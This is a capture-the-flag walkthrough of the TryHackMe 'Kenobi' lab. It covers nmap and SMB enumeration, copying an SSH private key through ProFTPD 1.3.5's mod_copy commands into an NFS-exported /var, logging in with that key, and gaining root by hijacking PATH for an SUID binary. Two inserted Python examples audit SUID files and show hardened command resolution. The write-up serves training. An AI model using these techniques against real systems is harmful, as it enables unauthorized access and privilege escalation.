
TryHackMe-Kenobi

Room link: Kenobi
Introduction:

This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary.

In short, this box walks through accessing a Samba share, abusing the proftpd vulnerability to obtain a foothold, and then escalating to root through an SUID binary.

Difficulty: Easy

Information gathering

[email protected]:~# nmap -sV -sC --script vuln -oN kenobi 10.10.187.245
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-11 02:20 UTC
Nmap scan report for ip-10.10.45.140.eu-west-1.compute.internal (10.10.45.140)
Host is up (0.0013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /admin.html: Possible admin folder
|_ /robots.txt: Robots file
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 40361/tcp mountd
| 100005 1,2,3 49262/udp mountd
| 100021 1,3,4 43179/tcp nlockmgr
| 100021 1,3,4 56568/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:F2:65:5B:D2:FA (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.90 seconds

From the nmap results we can see that the target runs SMB, HTTP, FTP (ProFTPD 1.3.5) and NFS (rpcbind on port 111), among other services.

Use nmap's SMB enumeration scripts to list the shares on the target:

nmap -p445,139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.45.140

If everything works, this returns share and user information for the target (screenshot of the output omitted).

It shows that the anonymous share allows anonymous access.

Access the anonymous share with smbclient:
smbclient //10.10.45.140/anonymous

The share contains a file called log.txt.
Download log.txt from the anonymous share with smbget (the URL needs the smb:// scheme):
smbget -R smb://10.10.45.150/anonymous/

The log contains information about SSH key generation and about the FTP service.

The earlier nmap scan also showed that port 111 (rpcbind) is open on the target.

(screenshot omitted: it shows that the target exports the /var directory over NFS)

From the nmap scan above we know the ProFTPD version is 1.3.5.
Use searchsploit to look for known vulnerabilities:

searchsploit ProFTPD 1.3.5

(screenshot of the searchsploit results omitted)

Exploitation

Here we use the mod_copy vulnerability.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

Since we saw earlier that the target allows mounting its /var directory, we copy the SSH key into /var (screenshot of the SITE CPFR/CPTO session omitted).

Create a mount point and mount the target's /var remotely:
mkdir /mnt/kenobiNFS
mount 10.10.45.140:/var /mnt/kenobiNFS

Connecting to the backdoor

Copy the id_rsa that was just placed in /var to the local machine, then connect with ssh -i (screenshot omitted):

ssh -i id_rsa [email protected]

We get the flag (screenshot omitted).

Privilege escalation

Now we should think about escalating privileges to get the second flag.

On Linux, some commands have the permission bits rws instead of rwx; these files are called SUID files.

The SUID permission is only meaningful on binary executables.
If the user running the file has the x permission on it, that user gains the privileges of the file's owner.
This privilege is only in effect while that executable is running.

So carelessly set SUID files can make a system very dangerous.
SGID files work the same way, except the SGID bit appears in the x position of the group permissions.
When SGID is set on a file, the user gains the privileges of the file's group while executing it.

The SBIT (sticky bit) only has an effect on directories: when a user creates a new file or directory inside such a directory, only that user and root may delete it.

For more on the SUID bit, check here.

find / -perm -u=s -type f 2>/dev/null

This command turns up one unusual binary that runs with root privileges.
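To make the permission-bit rules above and the find command concrete, here is an added Python example; it is not part of the original writeup. It decodes the SUID/SGID/sticky bits from a raw mode value the way ls displays them, and re-implements find / -perm -u=s -type f 2>/dev/null as a directory walk. The files it audits are a constructed scratch tree (the names bin/menu, bin/odd and so on are made up for the demo), so it runs as an ordinary user and never touches real system binaries.

```python
import os
import stat
import tempfile


def decode_special_bits(mode):
    """Report the special permission bits in a raw st_mode value.

    Follows the rules in the text: SUID/SGID only mean something on an
    executable, the sticky bit only on a directory. In ls output a lower-case
    's' (or 't') means the special bit sits on top of an execute bit; a capital
    'S' (or 'T') means the special bit is set but execute is not.
    """
    return {
        "suid": bool(mode & stat.S_ISUID),
        "sgid": bool(mode & stat.S_ISGID),
        "sticky": bool(mode & stat.S_ISVTX),
        "owner_exec": bool(mode & stat.S_IXUSR),
        "group_exec": bool(mode & stat.S_IXGRP),
        "is_dir": stat.S_ISDIR(mode),
        "ls_style": stat.filemode(mode),
    }


def find_suid_files(root):
    """Python equivalent of: find ROOT -perm -u=s -type f 2>/dev/null

    Regular files only (directories and symlinks are skipped), entries that
    cannot be stat'ed are ignored the way 2>/dev/null hides them, and the
    result is sorted so it is stable for comparison.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def build_demo_tree():
    """Constructed fixture (not a real system): a scratch directory holding
    files with a mix of modes. Returns (root, expected_hits). Setting SUID on
    a file you own needs no privileges, so this runs as a normal user."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    layout = {
        "bin/menu": 0o4755,    # SUID + execute: the case the audit is after
        "bin/normal": 0o755,   # plain executable, must not be reported
        "bin/odd": 0o4644,     # SUID without execute: shows as rwS, still matches -u=s
        "sbin/tool": 0o2755,   # SGID only, not matched by -u=s
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    shared = os.path.join(root, "shared")
    os.makedirs(shared, exist_ok=True)
    os.chmod(shared, 0o1777)   # sticky, world-writable directory, like /tmp
    expected = sorted([os.path.join(root, "bin/menu"), os.path.join(root, "bin/odd")])
    return root, expected


if __name__ == "__main__":
    root, _ = build_demo_tree()
    for path in find_suid_files(root):
        bits = decode_special_bits(os.lstat(path).st_mode)
        print(bits["ls_style"], path)
    print(decode_special_bits(os.lstat(os.path.join(root, "shared")).st_mode)["ls_style"])
```

Running it lists the two SUID entries from the scratch tree and prints drwxrwxrwt for the sticky directory. Note that -perm -u=s matches bin/odd even though it has no execute bit, so an audit should also check the x bit before treating a hit as a real escalation risk.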

Try running it.

(screenshots omitted: the binary's output and its strings show that it calls curl and uname without a full path)

This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).
As this file runs with the root user's privileges, we can manipulate our PATH to gain a root shell.
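The following Python example is added here to show, from the defender's side, exactly why a bare command name in a privileged program is the problem and what the fix looks like; it is not code from the original writeup or from the room. It is entirely self-contained: the "trusted" bin directory, the user-writable directory and the two uname scripts are constructed in temporary directories (they only print a message), and HARDENED_PATH, run_weak and run_hardened are names chosen for the demo. Both patterns are invoked with the same caller-controlled PATH; only the hardened one ignores it.

```python
import os
import shutil
import subprocess
import sys
import tempfile

# PATH a privileged helper should set for itself instead of trusting what it inherits.
HARDENED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def write_fake_command(directory, name, message):
    """Constructed stand-in for a command: a script that just prints `message`."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(f"print({message!r})\n")
    os.chmod(path, 0o755)  # executable, so a PATH search will accept it
    return path


def build_demo_dirs():
    """Constructed layout, not real system paths: a 'trusted' bin directory
    and a directory an unprivileged user can write to, both holding 'uname'."""
    trusted = tempfile.mkdtemp(prefix="trusted-bin-")
    writable = tempfile.mkdtemp(prefix="user-writable-")
    write_fake_command(trusted, "uname", "real uname")
    write_fake_command(writable, "uname", "replaced uname")
    return trusted, writable


def resolve_like_shell(command, path):
    """First hit on PATH, the same way sh or execvp() picks an executable."""
    return shutil.which(command, path=path)


def run_program(path):
    """Run one of the constructed scripts with this interpreter, return its output."""
    proc = subprocess.run([sys.executable, path], capture_output=True, text=True)
    return proc.stdout.strip()


def run_weak(command, inherited_path):
    """Vulnerable pattern from the text: a bare command name resolved through
    the PATH inherited from whoever launched the SUID program."""
    target = resolve_like_shell(command, inherited_path)
    return None if target is None else run_program(target)


def run_hardened(command, trusted_dir):
    """Mitigated pattern: an absolute path chosen by the program itself, plus a
    fixed PATH handed to the child so nothing it spawns inherits ours either."""
    target = os.path.join(trusted_dir, command)
    proc = subprocess.run([sys.executable, target], env={"PATH": HARDENED_PATH},
                          capture_output=True, text=True)
    return proc.stdout.strip()


def demo():
    """Same caller PATH for both patterns; only the hardened one ignores it."""
    trusted, writable = build_demo_dirs()
    caller_path = f"{writable}:{trusted}"   # writable directory first on PATH
    return run_weak("uname", caller_path), run_hardened("uname", trusted)


if __name__ == "__main__":
    weak, hard = demo()
    print("bare name, inherited PATH ->", weak)
    print("absolute path, fixed PATH ->", hard)
```

The weak call prints "replaced uname" because the writable directory comes first on the inherited PATH, while the hardened call prints "real uname" regardless of what the caller exported. The same two rules (absolute paths, and resetting PATH before spawning anything) are what a reviewer should look for in any SUID or sudo-allowed program.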

Here we first cd into the tmp directory and then redirect the shell to curl (screenshot omitted).
We get flag2.